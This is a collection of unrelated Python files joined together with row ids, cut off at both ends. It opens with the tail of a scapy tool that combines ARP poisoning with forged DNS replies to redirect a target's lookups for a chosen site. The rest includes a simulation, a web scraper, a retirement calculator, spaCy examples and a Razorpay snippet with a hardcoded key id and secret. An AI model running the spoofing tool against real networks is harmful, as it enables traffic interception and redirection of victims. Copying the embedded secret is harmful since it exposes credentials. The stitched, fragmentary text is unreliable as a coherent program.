/IP(ihl = packet[IP].ihl, src=packet[IP].dst, dst= packet[IP].src, ttl = packet[IP].ttl, chksum = None)
/UDP(sport=53, dport=packet[UDP].sport, len = None, chksum = None)
/DNS(id=packet[DNS].id, rd=1, qr=1, ra=1, z=0, rcode=0,qdcount=1, ancount=1, nscount=0, arcount=0,qd = DNSQR(qname = packet[DNSQR].qname, qtype = "A", qclass="IN"),an=DNSRR(rrname=packet[DNSQR].qname, rdata= "23.96.35.235",type="A",rclass="IN", ttl=174)))
udp_packet.show()
sendp(udp_packet)
def run(self):
#Only do packet sniffing
sniff( filter=f'ip src {self.targetip} and udp port 53',\
prn=self._analysis)
def join(self, timeout=None):
threading.Thread.join(self, timeout)
import argparse
def args():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('gatewayip', metavar='G', help='IP address of the gateway')
arg_parser.add_argument('targetip', metavar='T', help='IP address of the target')
arg_parser.add_argument('site', metavar='S', help='Domain to be spoofed')
arg_parser.add_argument('poisonip', metavar='P', help='New IP for the domain')
args = arg_parser.parse_args()
return args
def main(args):
targetip = args.targetip
gatewayip = args.gatewayip
site = args.site
poisonip = args.poisonip
print(f"Will spoof {targetip} of gateway {gatewayip} for site {site} as {poisonip}")
try:
arp_poison = ARPPoisonThread(targetip, gatewayip)
dns_poison = DNSPoisonThread(site, targetip)
arp_poison.start()
time.sleep(5)
dns_poison.start()
while True:
time.sleep(.1)
except KeyboardInterrupt:
arp_poison.join()
dns_poison.join()
if __name__ == "__main__":
main(args())
|
997,714 | 1346f251bfa849f1cf5cd0a49b1e19e66044226c | import numpy
import scipy
import math
import sys
import getopt
import random
from scipy import spatial
from scipy.special import erfinv
import copy
import networkx as nx
# This simulation scheme follows ISO spherical coordinate system convention.
# - angle_t(theta) := polar angle [0, pi]
# - angle_p(phi) := azimuth angle [0, 2*pi]
# Static variables (Hard-coded). ---------------------------------------
Instance_Count = 50
Angle_Lower_Bound = 0.003935
Angle_Upper_Bound = 3.126928
Max_Performance = 10 + math.sqrt(40/3)*erfinv( math.cos(Angle_Lower_Bound) ) # approx 21.5472
Min_Performance = 10 + math.sqrt(40/3)*erfinv( math.cos(Angle_Upper_Bound) ) # approx 0.0001
Approx_30p_Angle = 2.548343 # approx 10.7736
Approx_50p_Angle = 1.333029 # approx 10.7736
Approx_60p_Angle = 0.732863 # approx 12.9283
Approx_70p_Angle = 0.314320 # approx 15.083
Approx_80p_Angle = 0.100644 # approx 17.2377
Approx_90p_Angle = 0.023457 # approx 19.3924
## Explicit equation for angles x
## sqrt(40/3)*erfinv( cos(x) ) = P * ( sqrt(40/3)*erfinv( cos(LB) ) - sqrt(40/3)*erfinv( cos(UB) )) + sqrt(40/3)*erfinv( cos(UB) )
## sqrt(40/3)*erfinv( cos(x) ) = P * ( sqrt(40/3)*erfinv( cos(0.003935) ) - sqrt(40/3)*erfinv( cos(3.126928) )) + sqrt(40/3)*erfinv( cos(3.126928) )
# ----------------------------------------------------------------------
def normal_performance(opinion, answer):
# Assume market vector is not fixed.
angle = angle_between(opinion, answer)
return 10 + math.sqrt(40/3)*erfinv( math.cos(angle) )
def opinion_init(number_of_nodes, condition):
## Initialize polar angles (angle_t) and azimuth angles (angle_p)
angle_t = None
angle_p = None
if condition == 1:
# Initial performances are between 50% and 100%.
U50p = 0.5*(numpy.cos(Approx_50p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(U50p, 1.0, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 2:
# Initial performances are between 60% and 100%.
U60p = 0.5*(numpy.cos(Approx_60p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(U60p, 1.0, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 3:
# Initial performances are between 50% and 60%.
U50p = 0.5*(numpy.cos(Approx_50p_Angle) + 1)
U60p = 0.5*(numpy.cos(Approx_60p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(U50p, U60p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 4:
# Initial performances are between 0% and 50%.
U50p = 0.5*(numpy.cos(Approx_50p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U50p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 5:
# Initial performances are between 0% and 60%.
U60p = 0.5*(numpy.cos(Approx_60p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U60p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 6:
# Initial performances are between 0% and 70%.
U70p = 0.5*(numpy.cos(Approx_70p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U70p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 7:
# Initial performances are between 0% and 80%.
U80p = 0.5*(numpy.cos(Approx_80p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U80p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 8:
# Initial performances are between 0% and 90%.
U90p = 0.5*(numpy.cos(Approx_90p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U90p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
elif condition == 9:
# Initial performances are between 50% and 60%.
# and angle_p (phi) are between 0 and pi/6
U50p = 0.5*(numpy.cos(Approx_50p_Angle) + 1)
U60p = 0.5*(numpy.cos(Approx_60p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(U50p, U60p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1/20, number_of_nodes))
elif condition == 10:
# Initial performances are between 50% and 60%.
# and angle_p (phi) are between 0 and pi/6
U60p = 0.5*(numpy.cos(Approx_60p_Angle) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U60p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1/20, number_of_nodes))
elif condition == 11:
# Initial performances are between 0% and 47%.
U50p = 0.5*(numpy.cos(Approx_50p_Angle + 0.2) + 1)
angle_t = numpy.arccos(2 * numpy.random.uniform(0.0, U50p, number_of_nodes) - 1)
angle_p = 2 * math.pi * (numpy.random.uniform(0, 1, number_of_nodes))
result = []
for i in range(0, number_of_nodes):
result.append([angle_t[i], angle_p[i]])
return result
def spherical2cartesian(a):
## Input: a spherical coordinates with unit length. [theta, phi]
return [numpy.sin(a[0])*numpy.cos(a[1]), numpy.sin(a[0])*numpy.sin(a[1]), numpy.cos(a[0])]
def arc_midpoint(a, b):
## Input: two spherical coordinates with unit length.
cartesian_a = spherical2cartesian(a)
cartesian_b = spherical2cartesian(b)
lin_mpt = [ (cartesian_a[0] + cartesian_b[0])/2, \
(cartesian_a[1] + cartesian_b[1])/2, \
(cartesian_a[2] + cartesian_b[2])/2]
magnitude = numpy.sqrt(lin_mpt[0]**2 + lin_mpt[1]**2 + lin_mpt[2]**2)
mid_theta = numpy.arccos(lin_mpt[2]/magnitude)
mid_phi = numpy.arctan2(lin_mpt[1], lin_mpt[0]) ## [Note] usage of arctan2
return [mid_theta, mid_phi]
def learning(opinion_a, opinion_b, param):
if param == 1: ## 12.5%, 1/8
return arc_midpoint(opinion_a, learning(opinion_a, opinion_b, 2))
elif param == 2: ## 25%, 2/8
return arc_midpoint(opinion_a, learning(opinion_a, opinion_b, 4))
elif param == 3: ## 37.5%, 3/8
return arc_midpoint(learning(opinion_a, opinion_b, 2), learning(opinion_a, opinion_b, 4))
elif param == 4: ## 50%, 4/8
return arc_midpoint(opinion_a, opinion_b)
elif param == 5: ## 62.5%, 5/8
return arc_midpoint(learning(opinion_a, opinion_b, 4), learning(opinion_a, opinion_b, 6))
elif param == 6: ## 75%, 6/8
return arc_midpoint(learning(opinion_a, opinion_b, 4), opinion_b)
elif param == 7: ## 87.5%, 7/8
return arc_midpoint(learning(opinion_a, opinion_b, 6), opinion_b)
def angle_between(a, b):
a = numpy.inner( spherical2cartesian(a), spherical2cartesian(b) )
return numpy.arccos(a)
#return numpy.arccos( numpy.inner( spherical2cartesian(a), spherical2cartesian(b) ) )
def standardize(a):
# polar angle in [0, pi]
if a[0] > math.pi:
a[0] = 2*math.pi - a[0]
if a[0] < 0:
a[0] = -a[0]
# azimuth angle in [0, 2*pi]
if a[1] > 2*math.pi:
a[1] = a[1] - 2*math.pi
if a[1] < 0:
a[1] = 2*math.pi + a[1]
if a[0] < 0.003935:
##print a[0]
a[0] = 0.003935
if a[0] > 3.137657:
a[0] = 3.137657
return a
def simulator(input_option):
# input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
# 1. NodeCount := Indicates the number agents in the system (organization).
# 2. SearchRange := Represents the search range of each agent's learning activity.
# It is an upper limit of angle between two opinions.
# 3. LearningRate := Represents the learning rate of each agent.
# In this simulation, it is {25%, 50%, 75%}.
# 4. Behavior := Represents the degree of randomness in the learning process.
# 5. InitCondition := Represents the type of knowledge initialization pattern.
# 6. marketFileName:= File name of market vector movement.
NodeCount = int(input_option[0])
SearchRange = float(input_option[1])
LearningRate = int(input_option[2])
BehaviorParameter = float(input_option[3])
InitCondition = int(input_option[4])
convergence_log = []
elapsed_time_log = []
market_file = open(input_option[5], 'r')
market_data = []
for i in range(0, 201):
market_data.append( [float(x) for x in market_file.readline().split(",")] )
# [START] Simulations ----------------------------------------------
for instance in range(0, Instance_Count):
## initialize market coordinate
market = [0.0, 0.0]
## initialize opinions
opinion = opinion_init(NodeCount, InitCondition)
performance_log = []
flag = 0
time = 0
mind = 0
stop = False
current_performance = [0]*NodeCount
if instance < 0.001 and InitCondition == 4:
trackFile = open('./geonsik_result_track'+SearchRange+'.txt', 'w')
##while(stop == False):
while(time < 1000):
mind = int((time-1)/5)
market = market_data[mind]
# Step 1. Evaluation
performance_log.append(sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount))
for i in range(0, NodeCount):
current_performance[i] = normal_performance(opinion[i], market)
if time == 0:
print "max!!", max(current_performance)/(Max_Performance-Min_Performance)
if instance < 0.001 and InitCondition == 4:
for i in range(0, NodeCount):
cart = spherical2cartesian(opinion[i])
trackFile.write(repr(time)+","+",".join(str(x) for x in cart)+'\n');
# print opinion[i], " ::::", current_performance[i]
#print "----------------"
#print time, " ",max(current_performance/(Max_Performance-Min_Performance))
# Step 2. Learning.
new_opinion = [[0 for v1 in range(2)] for v2 in range(NodeCount)]
for i in range(0, NodeCount):
# Step 2-1. Search and Assimilate.
best_value = current_performance[i]
best_index = i
for j in range(0, NodeCount):
if ( angle_between(opinion[i], opinion[j]) < SearchRange*math.pi ) \
and current_performance[j] > best_value:
#if current_performance[j] > best_value:
best_value = current_performance[j]
best_index = j
#print best_index, " ",best_value/(Max_Performance-Min_Performance)
if i != best_index:
new_opinion[i] = learning(opinion[i], opinion[best_index], LearningRate)
else:
new_opinion[i] = opinion[i]
#print "---------"
#print opinion[i]
#print opinion[best_index]
#print new_opinion[i]
#print "---------"
# Step 2-2. Add Perturbation.
for j in range(0, 2):
new_opinion[i][j] += numpy.random.uniform(-BehaviorParameter, +BehaviorParameter)
# Step 2-3. Standardize.
new_opinion[i] = standardize(new_opinion[i])
opinion = copy.deepcopy(new_opinion)
# Step 3. Record Time and Check Exit Condition.
time += 1
if (len(performance_log) > 2) and (abs(performance_log[-1] - performance_log[-2]) < 0.002):
flag += 1
#else:
# flag = 0
if flag > 4:
stop = True;
if sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount) > 0.95:
stop = True;
#if time%100 == 0:
# print sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount), " ", best_value/(Max_Performance-Min_Performance)
#if (len(performance_log) > 2):
# print performance_log[-1]
#if time > 100:
# stop = True;
org_performance = sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount)
print "Convergence = ", org_performance, ", Elapsed Time = ", time
convergence_log.append(org_performance)
elapsed_time_log.append(time)
# [END] Simulations ------------------------------------------------
# return average statistics of instances under given conditions.
##return [sum(convergence_log)/len(convergence_log), sum(elapsed_time_log)/(1.0*len(elapsed_time_log))]
return [sum(convergence_log)/len(convergence_log), numpy.var(convergence_log)]
def main(argv=None):
if argv is None:
argv = sys.argv
# parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help"])
except getopt.error, msg:
print msg
print "for help use --help"
sys.exit(2)
# process arguments
NodeCount = 0
Neighbor = 0
LearningRate = 0
BehaviorParameter = 0
## set random seed.
numpy.random.seed(1)
if len(args) > 0:
NodeCount = int(args[0])
if len(args) > 1:
Neighbor = int(args[1])
if len(args) > 2:
LearningRate = float(args[2])
if len(args) > 3:
BehaviorParameter = float(args[3])
##org_option = [NodeCount, LearningRate, BehaviorParameter]
#for BP in [0.0, 0.05, 0.1, 0.15, 0.20, 0.25, 0.3, 0.35, 0.4]:
condition = 11
##f = open('./geonsik_result'+repr(condition)+'.txt', 'w')
##for BP in [0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.1, 0.15, 0.20, 0.25, 0.3, 0.35, 0.4]:
##for BP in [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]:
##for BP in [0.0, 0.4, 0.8, 1.2, 1.6]:
##for BP in [0.0]:
if False: ## Experiment 1: Effect of Randomness
L = 3
for BP in [0.0, 0.01, 0.02, 0.03, 0.04, 0.05]:
print BP
for condition in [11, 4,5,6,7]:
org_option = [40, 1, L, BP, condition]
# input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
result = simulator(org_option)
f.write(repr(condition)+","+repr(BP)+","+repr(result[0])+","+repr(result[1])+'\n');
## --------------------------------------------------------------------------------------------
if False: ## Experiment 2: Value of Slow Learning
BP = 0
##for L in [12.5, 25, 37.5, 50, 62.5, 75]:
for L in [1,2,3,4,5,6,7]:
for condition in [11, 4,5,6,7]:
org_option = [40, 1, L, BP, condition]
# input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
result = simulator(org_option)
f.write(repr(condition)+","+repr(BP)+","+repr(L)+","+repr(result[0])+","+repr(result[1])+'\n');
## --------------------------------------------------------------------------------------------
if True: ## Experiment 3: Value of
BP = 0
L = 3
market_file = "./market_simga2.0/market0_mu0.0_sigma2.0.txt"
## market_file = "./market_simga2.0/market0_mu0.0_sigma2.0.txt"
for condition in [11, 4,5,6,7]:
##for searchRange in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]:
#for searchRange in [0.1, 0,2]5
for searchRange in [0.9, 1]:
f = open('./geonsik_result'+repr(searchRange)+'.txt', 'w')
org_option = [40, searchRange, L, BP, condition, market_file]
# input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
result = simulator(org_option)
f.write(repr(condition)+","+repr(searchRange)+","+repr(result[0])+","+repr(result[1])+'\n');
## --------------------------------------------------------------------------------------------
f.close()
if __name__ == "__main__":
main() |
997,715 | 0a86eece0ea3fac9a12f3ac71ab7f0534f884f37 | print ("%s is a string, %d is a decimal %.3f is a floating no. upto 3 decimal no. place")
|
997,716 | c1e4eb02911180b65833df1278727565cf19a8f5 | import argparse
#import requests
import time
import pandas as pd
#import os
from pathlib import Path
from bs4 import BeautifulSoup
from selenium import webdriver
from random import randrange
max_tries = 10
root = Path(__file__).parents[1]
descr = ("Download UNFCCC National Inventory Submissions lists "
"and create list of submissions as CSV file")
parser = argparse.ArgumentParser(description=descr)
parser.add_argument(
'year',
help='Year to download'
)
args = parser.parse_args()
year = args.year
print("Fetching submissions for {}".format(year))
url = (
"https://unfccc.int/process/transparency-and-reporting/"
"reporting-and-review-under-the-convention/"
"greenhouse-gas-inventories-annex-i-parties/"
"submissions/national-inventory-submissions-{}".format(year)
)
if int(year) == 2019:
url = (
"https://unfccc.int/process-and-meetings/transparency-and-reporting/"
"reporting-and-review-under-the-convention/"
"greenhouse-gas-inventories-annex-i-parties/"
"national-inventory-submissions-{}".format(year)
)
if int(year) >= 2020:
url = (
"https://unfccc.int/ghg-inventories-annex-i-parties/{}".format(year)
)
print(url)
#result = requests.get(url)
# set options for headless mode
options = webdriver.firefox.options.Options()
options.add_argument('-headless')
# create profile for headless mode and automatical downloading
profile = webdriver.FirefoxProfile()
# set up selenium driver
driver = webdriver.Firefox(options = options, firefox_profile = profile)
driver.get(url)
html = BeautifulSoup(driver.page_source, "html.parser")
table = html.find("table")
# check if table found. if not the get command didn't work, likely because of a captcha on the site
### TODO replace by error message
if not(table):
# try to load htm file from disk
print('Download failed, trying to load manually downloaded file')
file = open("manual_page_downloads/National-Inventory-Submissions-{}.html".format(year))
content = file.read()
html = BeautifulSoup(content, "html.parser")
table = html.find("table")
if not(table):
print("Manually downloaded file " + "manual_page_downloads/National-Inventory-Submissions-{}.html".format(year) +
" not found")
exit()
links = table.findAll('a')
targets = [] # sub-pages
downloads = []
no_downloads = []
# Check links for Zipfiles or subpages
for link in links:
if "href" not in link.attrs:
continue
href = link.attrs["href"]
if "/documents/" in href:
if "title" in link.attrs.keys():
title = link.attrs["title"]
else:
title = link.contents[0]
if href.startswith("/documents"):
href = "https://unfccc.int" + href
# Only add pages in the format https://unfccc.int/documents/65587
# to further downloads
if str(Path(href).parent).endswith("documents"):
targets.append({"title": title, "url": href})
elif href.endswith(".zip"):
if href.startswith("/files"):
href = "https://unfccc.int" + href
country = Path(href).name.split("-")[0].upper()
title = "{} {}".format(country, link.contents[0])
print("\t".join([title, href]))
downloads.append({"Title": title, "URL": href})
# Go through sub-pages.
for target in targets:
time.sleep(randrange(5, 15))
url = target["url"]
i = 0
while i < max_tries:
try:
#subpage = requests.get(url, timeout=15.5)
#html = BeautifulSoup(subpage.content, "html.parser")
driver.get(url)
html = BeautifulSoup(driver.page_source, "html.parser")
title = html.find("h1").contents[0]
break
except AttributeError:
print("Error fetching " + target["url"])
print("Retrying ...")
time.sleep(randrange(5, 15))
i += 1
continue
if i == max_tries:
print("Aborting after {}".format(max_tries) + " tries")
quit()
h2 = html.find("h2", text="Versions")
if h2:
div = h2.findNext("div")
links = div.findAll("a")
if len(links) > 1:
print("Warning: More than one link found. Downloading only the first file.")
zipfile = links[0].attrs["href"]
downloads.append({"Title": title, "URL": zipfile})
print("\t".join([title, url, zipfile]))
else:
no_downloads.append((title, url))
if len(no_downloads) > 0:
print("No downloads for ", no_downloads)
driver.close()
df = pd.DataFrame(downloads)
df.to_csv(root / "data/submissions-{}.csv".format(year), index=False)
|
997,717 | ac809f0dcb62b96d8f413ae3cb779743489d2a43 | import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(-np.pi, np.pi, 200)
cosy = np.cos(x) / 2
siny = np.sin(x)
plt.plot(x, cosy, linestyle="-", linewidth=1, color="red")
plt.plot(x, siny, linestyle=":", linewidth=2.5, color="green")
plt.show() |
997,718 | 8746b00b6ad68ca94c2c90038259db1c795b64b9 | ### Test : warehouses_clients.py ==> OK
import time
from warehouses_clients import *
# Warehouses
df_warehouses
# "random_clients" function
start_time = time.time()
df_complete, indexes = random_clients(5)
print("Temps d'exécution : %s secondes ---" % (time.time() - start_time))
print(f"indexes : {indexes}")
df_complete
### Test : routes.py ==> OK
from routes import *
# 'nearest_nodes' function
coords_list, nearest_nodes_list = nearest_nodes(df_complete)
print(f'coords_list : {coords_list} \n')
print(f'nearest_nodes_list : {nearest_nodes_list}')
# 'itineraries' function ==> slow but it works
coords_list, weight_array, itineraries_dict = itineraries(df_complete)
print(f'coords_list : {coords_list} \n')
print(f'weight_array : \n {weight_array} \n')
print(f'itineraries_dict : \n {itineraries_dict}') |
997,719 | a8fc01ceea8829fad4f5ad398d8e555afd53a54d | """
Name: Priyanka Gnanasekaran
Class: CS 521 - Fall 1
Date:10/8/2020
Final Project - Home Expense & Retirement Calculator
"""
#Requirement: The class must be imported by main program
from gpriyan_final_classes import Monthly
import datetime
print("\nHome Expense and Retirement Calculator.\n")
#Requirement: User-Defined Functions
def retire_calc(current_savings,current_age,retirement_age,
avg_annual_return,yearly_contribution):
'''This function calculates retirement amount and returns it.'''
#Requirement: assert unit test
assert retirement_age >= current_age, 'Please enter your valid age!'
year_s = retirement_age - current_age
#retirement main calculation
retire_amt = current_savings * ((avg_annual_return) ** (year_s))
while year_s > 0:
year_s -= 1
retire_amt += yearly_contribution * (avg_annual_return ** year_s)
retire_amt = round(retire_amt,2)
assert retire_amt != 0, 'Please enter valid data!'
#Requirement: assert unit test
return retire_amt
if __name__ == "__main__":
print("\nPlease enter your choice of calculation:(e.g m for monthly)")
u_choi=input("Bi-weekly = bw, Weekly = w,"
"\nMonthly = m, Semi-Monthly = sm:")
u_choi=u_choi.lower() #taking input as lower case
#Requirement: Iteration type WHILE and FOR
while u_choi.isalnum():
#Requirement: try blocks
try:
#calcuations for four types of income.
#Requirement: Conditional IF
if u_choi == 'bw':
salary_in= float(input("Please Enter your Bi-weekly income:$"))
Expense=input("Type bi-weekly expenses with space inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type and iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent for this bi-week:$",g_expense)
#instantiate class methods
res= Monthly.bi_weekly_cal(salary_in,g_expense)
print("Amount saved per year:$",round(res,2))
elif u_choi== 'm':
salary_in= float(input("Please Enter your monthly income:$"))
Expense=input("Type monthly expenses with spaces inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type and iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent for this month:$",g_expense)
#instantiate class Monthly
rest = Monthly(salary_in,g_expense)
print((rest))
elif u_choi == 'w':
salary_in= float(input("Please Enter your weekly income:$"))
Expense=input("Type weekly expenses with spaces inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type anf iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent this week:$",g_expense)
#calling class method
res= Monthly.weekly_cal(salary_in,g_expense)
print("Amount saved per year:$",round(res,2))
elif u_choi == 'sm':
salary_in= float(
input("Please Enter your semi-months income:$"))
Expense=input("Type semi-month expenses with space inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type and iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent for this semi-month:$",g_expense)
#calling class method
res= Monthly.semimon_cal(salary_in,g_expense)
print("Amount saved per year:$",round(res,2))
elif u_choi == 'r':
#Retirement calculations
print("\nRetirement calculation.")
u_name=input("Enter your name for record reference:")
current_savings=float(
input("Enter current saving for retirement:"))
current_age=float(
input ("Enter your current age:"))
retirement_age=float(
input ("Enter your desired retirement age:"))
yearly_contribution=float(
input("Enter yearly contribution:"))
print("\nAverage annual return is a ratio:",
" 1.07 is a 7% annual return")
avg_annual_return=float(
input("Enter the average annual return:"))
#calling retire_calc fuction
retire_amt = retire_calc(float(current_savings),
float(current_age),
float(retirement_age),float(avg_annual_return),
float(yearly_contribution))
#printing retirement amount
age= retirement_age - current_age
print("\nHi {}!! In {} years, the retirement amount will be: {}"
.format(u_name,int(age),retire_amt))
#Requirement: Input and/or Output file
#Saving the retirement calculated amount in a file.
new_file= open("new_test.txt","a+")
print("\nHi {name}! In {age} years retirement amount will be:"
"${amt} record saved on {dt}".format(
name=u_name,
age=int(age),
amt=retire_amt,
dt=(datetime.datetime.now().strftime('%Y-%m-%d %H:%M')))
,file = new_file)
new_file.close() #close the files.
#Testing the input file for existence and
#printing an error message, if the file does not exist.
print("\nText file has been updated!!")
report =input("Do you want to review your file type Yes or No:")
report = report.lower()
if report == 'yes':
new_temp_file= open("new_test.txt","r")
if new_temp_file != 0:
file_content = new_temp_file.read()
print(file_content)
print("\nThank you for using Home Expense ",
"& Retirement Calculator.")
break
else:
print("file doesn't exists")
new_temp_file.close() #close the file.
elif report == 'no':
print("\nThank you for using Home Expense",
" & Retirement Calculator.")
break
else:
print("Error: Please enter a valid choice")
break
print("\nPlease enter your choice of calculation:")
u_choi=input("Bi-weekly = bw, Weekly = w,"
"\nMonthly = m, Semi-Monthly = sm, Retirement = r:")
#Requirement: try-except blocks
except TypeError:
print("TypeError: Please enter a valid input")
break
#Requirement: try-except blocks
except ValueError:
print("ValueError: Please enter a valid input")
break
else:
print("Error: Please enter a valid choice") |
997,720 | 02cd5d962be16ea57367d110cd7a6d89d6225ecc | keyid = 'rzp_test_ixIzmpmVcqXV1J'
keySecret = 'fCwpPR7wrXeClCzZjA7adlKg'
import razorpay
client = razorpay.Client(auth=(keyid,keySecret))
data ={
'amount' : 100*100,
"currency": "INR",
"receipt" : "TSC",
"notes":{
"name": "TEJAS",
"Payment_for" : "IOT"
}
}
order = client.order.create(data=data)
print(order)
#client.utility.verify_payment_signature(params_dict) |
997,721 | ed70839ed32df6b446f5c526fe64647f1ea572fa | #!/usr/bin/env python
import os
import toml
from setuptools import setup, find_packages
REQUIREMENTS_FILE = 'requirements.txt'
README_FILE = 'README.md'
PYPROJECT_FILE = 'pyproject.toml'
SETUP_KWARGS = [
'name',
'version',
'description',
'author',
'authors',
'author_email',
'license',
'url',
'project_urls',
'download_url',
'keywords',
'classifiers',
'packages',
'include',
'extras_require',
'include_package_data',
'python_requires',
]
INCLUDE = ['pyproject.toml', 'init.py']
EXCLUDE_PACKAGE = ['tests*']
def get_requirements():
"""Build the requirements list for this project"""
requirements_list = []
if not os.path.isfile(REQUIREMENTS_FILE):
# Check if requirements file did not exist.
return requirements_list
with open(REQUIREMENTS_FILE) as reqs:
for install in reqs:
requirements_list.append(install.strip())
return requirements_list
def get_setup_kwargs(default=None):
"""Get setup kwargs"""
with open(README_FILE, 'r', encoding='utf-8') as fd:
kwargs = dict(
long_description=fd.read(),
install_requires=get_requirements(),
include=INCLUDE,
packages=find_packages(exclude=EXCLUDE_PACKAGE),
)
if isinstance(default, dict):
kwargs.update(default)
pyproject = toml.load(PYPROJECT_FILE)
for k, v in dict(pyproject['tool']['poetry']).items():
if k in SETUP_KWARGS:
if k not in kwargs:
kwargs[k] = v
continue
if isinstance(kwargs[k], list):
kwargs[k].extend(v)
elif isinstance(kwargs[k], dict):
kwargs[k].update(v)
return kwargs
def main():
setup(**get_setup_kwargs())
if __name__ == '__main__':
main()
|
997,722 | 063d2224cb083832ef287a42955e51af46e38ff7 | # A Span is a slice of a Doc consisting of one or more tokens.
# Span takes at least three arguments:
#the doc it refers to, and the start and end index of the span.
# Remember that the end index is exclusive!
# Manually create a Span
from spacy.tokens import Span
doc = nlp("Hello world!")
span = Span(doc, 0, 2)
# Create a span with a label
span_with_label = Span(doc, 0, 2, label="GREETING")
# Add span to the doc.ents (entities)
doc.ents = [span_with_label]
# Example: Create a Doc *manually*
# 1
import spacy
nlp = spacy.load("en_core_web_sm")
# Import the Doc class
from spacy.tokens import Doc
# Desired text: "spaCy is cool!"
words = ["spaCy", "is", "cool", "!"]
spaces = [True, True, False, False]
# Create a Doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# 2
import spacy
nlp = spacy.load("en_core_web_sm")
# Import the Doc class
from spacy.tokens import Doc
# Desired text: "Go, get started!"
words = ["Go", ",", "get", "started", "!"]
spaces = [False, True, True, False, False]
# Create a Doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# 3
import spacy
nlp = spacy.load("en_core_web_sm")
# Import the Doc class
from spacy.tokens import Doc
# Desired text: "Oh, really?!"
words = ["Oh", ",", "really", "?", "!"]
spaces = [False, True, False, False, False]
# Create a Doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# Example: Create a Doc + Span
from spacy.lang.en import English
nlp = English()
# Import the Doc and Span classes
from spacy.tokens import Doc, Span
words = ["I", "like", "David", "Bowie"]
spaces = [True, True, True, False]
# Create a doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# Create a span for "David Bowie" from the doc and assign it the label "PERSON"
span = Span(doc, 2, 4, label="PERSON")
print(span.text, span.label_)
# Add the span to the doc's entities
doc.ents = [span]
# Print entities' text and labels
print([(ent.text, ent.label_) for ent in doc.ents])
# Example: identify proper noun followed by a verb
import spacy
nlp = spacy.load("en_core_web_sm")
doc = nlp("Berlin is a nice city")
# Get all tokens and part-of-speech tags
token_texts = [token.text for token in doc]
pos_tags = [token.pos_ for token in doc]
for token in doc:
# Check if the current token is a proper noun
if token.pos_ == "PROPN":
# Check if the next token is a 'VERB'
if doc[token.i + 1].pos_ == "VERB":
print("Found proper noun before a verb:", token.text)
|
997,723 | 935a02b0bb535778dfdd0f2f14e71e12b6f4478c | """
INFO8003-1
2020 - 2021
Final Project
Inverted Double Pendulum
François LIEVENS - 20103816
Julien HUBAR - 10152485
In this file we are implementing a simple Neural
network using fully connected layers in order to
approximate our non-linear Q-value function.
"""
import torch
import gym
import pybullet_envs
import numpy as np
from ActorCriticNeural import ActorCriticNeural
import time
import os
from Learner import Learner
import pandas as pd
from torch.distributions import Categorical
GRAPHICAL = False
TIME_STEP = 1/1000
NB_EPISODE = 10000
MAX_EPI_LEN = 1000
DEVICE = 'cuda:0'
DISCOUNT = 0.8
SAVE_INTERVAL = 1000
STATE_SIZE = 9
NB_ACTONS = 50
LEARNING_RATE = 2e-6
EPSILON = 0.2
DROPOUT = 0
def trainer(name='PGRAD_A'):
# Get the environment
env = gym.make("InvertedDoublePendulumBulletEnv-v0")
# Get the policy network
